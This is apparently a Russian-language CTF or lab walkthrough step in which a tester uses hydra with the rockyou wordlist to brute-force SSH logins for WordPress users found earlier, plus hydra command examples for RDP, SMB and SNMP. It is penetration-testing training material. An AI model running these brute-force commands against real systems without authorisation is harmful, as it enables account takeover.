# 01 - BruteForce

Так как на этапе сканирования WordPress (<mark style="color:green;">user enumeration</mark>) мы нашли двух пользователей (steven и michael), проверкой слабости их паролей мы и займемся.\
Мы попробуем сбрутить SSH сервер, вдруг наши пользователи WordPress являются еще и юзерами SSH ?&#x20;

### Выбор инструмента

Есть отличный и годами зрекомендовавший себя брутфорсер [thc-hydra](https://github.com/vanhauser-thc/thc-hydra) , поддерживает огромное колличество протоколов,  кроссплатформенна, умеет генерировать свои словари.\
Альтернативой Гидре может стать [medusa](https://github.com/jmk-foofus/medusa) , но она к сожалению не так активно развивается.

И так, попробуем.

```bash
// Ключи: -l логин -P файл с паролями -t кол-во потоков
hydra -l michael -P  /usr/share/wordlists/rockyou.txt -t4 ssh://SERVER-IP
```

<figure><img src="https://2826317613-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyxXcvCa5Rbt6bHhLblf7%2Fuploads%2FduhClCHateiEooUDgNq8%2F%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5.png?alt=media&#x26;token=b7c25561-fc38-49c7-ae60-ab91a8398cad" alt=""><figcaption><p>Пойманный пароль для учетки Michael</p></figcaption></figure>

Замечательно, учетка michael оказалась брутабельной, пароль как видно из скрина совпадает с именем. Со второй второй учетки улова нет. Можно конечно попробовать поменять словарь, но нам пока это не нужно.\
Мы попытаемся зайти по ssh (а вдруг мы root уже).

Еще пара примеров использования hydra

```bash
// модуль RDP
hydra rdp://server-ip/localdomain -l admin -p strongPASS
// модуль SMB
hydra smb://server-ip -l admin -p strongPASS -m "local lmv2"
// модуль SNMP (комбо вариант)
hydra -L user.txt -P pass.txt -m 3:SHA:AES:READ server-ip snmp
```
